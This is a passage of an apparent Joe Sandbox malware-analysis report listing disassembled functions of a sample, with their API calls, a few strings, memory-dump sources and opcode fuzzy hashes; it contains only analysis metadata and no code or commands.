                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1015461914-0
                                                                                                                                                                                                                              • Opcode ID: 4077530d9f27e19f62c6abee9a8c26aba7e288fcafaf6f6ac50d63c945cb351f
                                                                                                                                                                                                                              • Instruction ID: 4b11731b0045f657c5cc5741f43272a0d3d96ba3c99b27a4e3e1db65b4cd12d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4077530d9f27e19f62c6abee9a8c26aba7e288fcafaf6f6ac50d63c945cb351f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19417032B05548C9E7078F1AFDA079A62A5A7887D4F84422AEE1D47358FF7CE9829300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A13FC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freestrrchr
                                                                                                                                                                                                                              • String ID: .pye
                                                                                                                                                                                                                              • API String ID: 4178315289-4135401513
                                                                                                                                                                                                                              • Opcode ID: 907a65d08f65bdfb5aa171f891c3e26c334b27ecc9f4144512384fd326ed1612
                                                                                                                                                                                                                              • Instruction ID: eaef8938247e69d8d453e3f895308ab49d808d0e504d4ce3f8b69ada87c0218e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 907a65d08f65bdfb5aa171f891c3e26c334b27ecc9f4144512384fd326ed1612
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74110822B1561589EB059B26BD1036D6364AB88FD5F4845349F0E07B58FE3CD8C6C304
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A05410 Relevance: 5.3, APIs: 4, Instructions: 286COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                              • Opcode ID: 64d548ab96f375b3476ec83009199c96de6a841042906f4244ab8b4650dff394
                                                                                                                                                                                                                              • Instruction ID: afb434b17b4b3b996ef1a415a585f3327e0eb7c74facee485c4a3b199489736d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64d548ab96f375b3476ec83009199c96de6a841042906f4244ab8b4650dff394
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFB1F3B26187C886DB42CF34E804A4F7FADEB06794F89C615EE5A4B398E739C945D301
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A2C910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __iob_func.MSVCRT ref: 70A2C920
                                                                                                                                                                                                                              • abort.MSVCRT(?,?,?,?,CA4587E7,70A2D52F,?,?,?,?,70A02A6C), ref: 70A2C941
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • LTC_ARGCHK '%s' failure on line %d of file %s, xrefs: 70A2C926
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __iob_funcabort
                                                                                                                                                                                                                              • String ID: LTC_ARGCHK '%s' failure on line %d of file %s
                                                                                                                                                                                                                              • API String ID: 1307436159-2823265812
                                                                                                                                                                                                                              • Opcode ID: 68846412465bfdf53c8fea3144a729ec7ff27fe66ffaa02d00069f16d1822b35
                                                                                                                                                                                                                              • Instruction ID: f4b1a25cad9baf9df9c2b73c710f0ac1dbd1af9c4ed7bf4a5ca65bd2c0112bbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68846412465bfdf53c8fea3144a729ec7ff27fe66ffaa02d00069f16d1822b35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD05E6172869991DA106B26AA04B596BA0BB59FD5F988211ED4C83B299B68D206C340
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A02410 Relevance: 5.0, APIs: 4, Instructions: 48stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$freestrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1041141762-0
                                                                                                                                                                                                                              • Opcode ID: 24cc6dfa6b12a89a4e3e1c88d6957379ecd598826e77735a6a2fec90029b2f5c
                                                                                                                                                                                                                              • Instruction ID: 7dd63287bcb2756d45348a1c1bb45cd2d980cc68d2721da742b1ad827c99da21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24cc6dfa6b12a89a4e3e1c88d6957379ecd598826e77735a6a2fec90029b2f5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF0F42270035449E765DB23BD81B1FAAD57B8CBD8F4842399E4D43B68EE3CD5468304
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A954A0 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4020351045-0
                                                                                                                                                                                                                              • Opcode ID: 3c83de5d08a948118f2dd26405312ed86d229512f17bb6cfa79a51df98e77f25
                                                                                                                                                                                                                              • Instruction ID: 2b087e18540180f40cea93b741a540fbc7633d33502f7f1eb5ca65f80e07cbda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c83de5d08a948118f2dd26405312ed86d229512f17bb6cfa79a51df98e77f25
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61014C61B25600C3DF098B65E88131923F2BBA8B80F954625C90EC3328EB3CEA858704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%